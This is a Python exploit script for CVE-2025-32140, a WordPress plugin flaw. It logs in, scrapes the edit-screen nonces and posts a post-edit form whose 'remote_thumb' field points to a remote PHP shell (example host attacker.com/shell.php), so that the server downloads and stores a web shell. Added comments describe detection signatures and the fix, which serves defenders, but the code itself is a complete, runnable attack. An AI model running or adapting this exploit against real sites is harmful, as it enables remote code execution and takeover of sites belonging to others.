import requests
import argparse
import re
from bs4 import BeautifulSoup
from requests_toolbelt.multipart.encoder import MultipartEncoder
# Exploit By: Nxploited ( Khaled Alenazi )
def initialize_session():
    """Create the ``requests.Session`` shared by every request in this script.

    Returns:
        A session with certificate verification switched off and a fixed
        desktop-Chrome ``User-Agent`` header.
    """
    browser_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    http = requests.Session()
    # Certificate validation is off for every request made on this session,
    # so the WordPress credentials posted later are not protected against an
    # on-path interceptor.
    http.verify = False
    # Hard-coded Chrome 113 string: unmodified copies of this script are
    # recognisable in web-server access logs by this exact value.
    http.headers["User-Agent"] = browser_ua
    return http
def parse_arguments():
    """Parse the command line; every option is mandatory.

    Returns:
        argparse.Namespace with the attributes ``url``, ``username``,
        ``password``, ``user_ID``, ``post_ID`` and ``shell`` (all strings).
    """
    cli = argparse.ArgumentParser(description="Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi")
    # (option strings, help text), registered in this order.
    # NOTE: the password is taken as a plain argument, so it ends up in shell
    # history and is visible in the process list while the script runs.
    option_table = (
        (("--url", "-u"), "Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)"),
        (("--username", "-un"), "Username"),
        (("--password", "-p"), "Password"),
        (("--user_ID", "-uid"), "User ID (usually 1 for admin)"),
        (("--post_ID", "-pid"), "Target post ID"),
        (("--shell",), "URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)"),
    )
    for option_strings, help_text in option_table:
        cli.add_argument(*option_strings, required=True, help=help_text)
    return cli.parse_args()
def login(session, url, username, password):
    """Post the credentials to ``wp-login.php`` and require a logged-in cookie.

    The rest of the script runs on this authenticated session, so the
    behaviour it demonstrates is only reachable by an account that can sign
    in to the site.

    Args:
        session: the shared requests session; it keeps the cookies WordPress sets.
        url: base URL of the WordPress site (no trailing path is added or removed).
        username: account name sent as ``log``.
        password: account password sent as ``pwd``.

    Exits the process via ``exit()`` when no logged-in cookie is present.
    """
    credentials = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    session.post(f"{url}/wp-login.php", data=credentials)
    # Success is judged only by a cookie whose name contains
    # 'wordpress_logged_in'; the response status and body are not inspected.
    for jar_entry in session.cookies:
        if 'wordpress_logged_in' in jar_entry.name:
            print("[+] Logged in successfully.")
            return
    print("[!] Failed to log in.")
    exit()
def set_cookies(session, url):
    """Request the new-post admin screen once and discard the response.

    Args:
        session: the authenticated requests session.
        url: base URL of the WordPress site.
    """
    # Presumably this visit lets WordPress add any further admin cookies to
    # the session -- the response is never examined, so the message below is
    # printed whether or not the request succeeded.
    session.get(f"{url}/wp-admin/post-new.php")
    print("[+] Cookies set successfully.")
def fetch_nonces(session, url, post_ID):
    """Load the edit screen of ``post_ID`` and collect the nonces embedded in it.

    Args:
        session: the authenticated requests session.
        url: base URL of the WordPress site.
        post_ID: ID of the post whose edit screen is requested.

    Returns:
        A tuple ``(nonces, x_wp_nonce, edit_url)``: ``nonces`` maps five hidden
        input names to their ``value`` (``None`` when the input is absent),
        ``x_wp_nonce`` is the hex string assigned to ``window._wpNonce`` in the
        page (or ``None``), and ``edit_url`` is the URL that was fetched.
    """
    edit_url = f"{url}/wp-admin/post.php?post={post_ID}&action=edit"
    response = session.get(edit_url)
    page_html = response.text
    dom = BeautifulSoup(page_html, 'html.parser')

    def extract_nonce(name):
        # Value of the <input name=...> element, or None when it is not on the page.
        field = dom.find('input', {'name': name})
        if field:
            value = field['value']
        else:
            value = None
        print(f"[DEBUG] Extracted {name}: {value}")
        return value

    # 'wprthumb_nonce' is the only name here that is not a stock WordPress
    # edit-form field; presumably it is emitted by the plugin's meta box, so
    # it is only found when that meta box is rendered for this user and post.
    wanted_inputs = (
        '_wpnonce',
        'meta-box-order-nonce',
        'closedpostboxesnonce',
        'samplepermalinknonce',
        'wprthumb_nonce',
    )
    nonces = {input_name: extract_nonce(input_name) for input_name in wanted_inputs}

    rest_match = re.search(r"window\._wpNonce\s*=\s*\"([a-f0-9]+)\"", page_html)
    if rest_match:
        x_wp_nonce = rest_match.group(1)
    else:
        x_wp_nonce = None
    print(f"[DEBUG] Extracted X-WP-Nonce: {x_wp_nonce}")
    return nonces, x_wp_nonce, edit_url
def send_exploit(session, url, nonces, x_wp_nonce, post_ID, user_ID, shell, edit_url):
    """Submit the post-edit form as multipart data with ``remote_thumb`` set to ``shell``.

    The request is an ordinary ``editpost`` submission to
    ``/wp-admin/post.php``; the only non-standard parts are the
    ``wprthumb_nonce`` and ``remote_thumb`` fields. For detection, this is
    the request to look for in web or WAF logs: an authenticated multipart
    POST to ``/wp-admin/post.php`` whose ``remote_thumb`` value is an
    off-site URL, likely followed by an outbound fetch from the web server
    to that URL.

    Args:
        session: the authenticated requests session.
        url: base URL of the WordPress site.
        nonces: mapping returned by ``fetch_nonces`` (hidden-input name -> value).
        x_wp_nonce: value for the ``X-WP-Nonce`` header, or ``None`` to omit it.
        post_ID: ID of the post being edited.
        user_ID: sent both as ``user_ID`` and as ``post_author``.
        shell: URL placed in the ``remote_thumb`` field.
        edit_url: sent as the ``Referer`` header.
    """
    upload_url = f"{url}/wp-admin/post.php"
    m = MultipartEncoder(fields={
        '_wpnonce': nonces['_wpnonce'],
        '_wp_http_referer': f"{url}/wp-admin/post-new.php",
        'user_ID': user_ID,
        'action': 'editpost',
        'originalaction': 'editpost',
        'post_type': 'post',
        'original_post_status': 'auto-draft',
        'referredby': f"{url}/wp-admin/edit.php",
        '_wp_original_http_referer': f"{url}/wp-admin/edit.php",
        'auto_draft': '1',
        'post_ID': post_ID,
        'meta-box-order-nonce': nonces['meta-box-order-nonce'],
        'closedpostboxesnonce': nonces['closedpostboxesnonce'],
        'samplepermalinknonce': nonces['samplepermalinknonce'],
        'wprthumb_nonce': nonces['wprthumb_nonce'],
        # Caller-supplied URL. Presumably the server-side handler downloads it
        # and stores the result under the uploads directory (the success
        # message below points there) -- confirm against the plugin source.
        # The fix belongs in that handler: restrict what it will fetch and
        # store; not executing PHP from the uploads directory limits the impact.
        'remote_thumb': shell,
        'comment_status': 'open',
        'ping_status': 'open',
        'post_author': user_ID
    })
    # Copy the session headers so the multipart Content-Type (which carries
    # the boundary) and the Referer apply to this request only.
    headers = session.headers.copy()
    headers['Content-Type'] = m.content_type
    headers['Referer'] = edit_url
    if x_wp_nonce:
        headers['X-WP-Nonce'] = x_wp_nonce
    response = session.post(upload_url, data=m, headers=headers)
    # A 200 only means the final response (redirects are followed by default)
    # was OK; the script never checks that anything was stored, so this
    # message alone does not show that a site is vulnerable or that a patch
    # has failed.
    if response.status_code == 200:
        print("[+] Exploit POST sent successfully. Check your uploads directory.")
        print("By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited")
    else:
        print(f"[!] Exploit failed. Status: {response.status_code}")
        # NOTE(review): the page lost its indentation; this debug print is
        # placed in the failure branch -- confirm against the original file.
        print("[DEBUG] Response body:", response.text)
def main():
    """Run the script's four requests in order on one session.

    Sequence: sign in, open the new-post screen, read the nonces from the
    target post's edit screen, then submit the edit form carrying the
    ``remote_thumb`` URL. In server logs this appears as a POST to
    ``wp-login.php``, GETs of ``post-new.php`` and ``post.php?...action=edit``,
    and a multipart POST to ``post.php`` from the same client.
    """
    opts = parse_arguments()
    http = initialize_session()
    login(http, opts.url, opts.username, opts.password)
    set_cookies(http, opts.url)
    nonce_fields, rest_nonce, referer = fetch_nonces(http, opts.url, opts.post_ID)
    send_exploit(
        http,
        opts.url,
        nonce_fields,
        rest_nonce,
        opts.post_ID,
        opts.user_ID,
        opts.shell,
        referer,
    )


# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()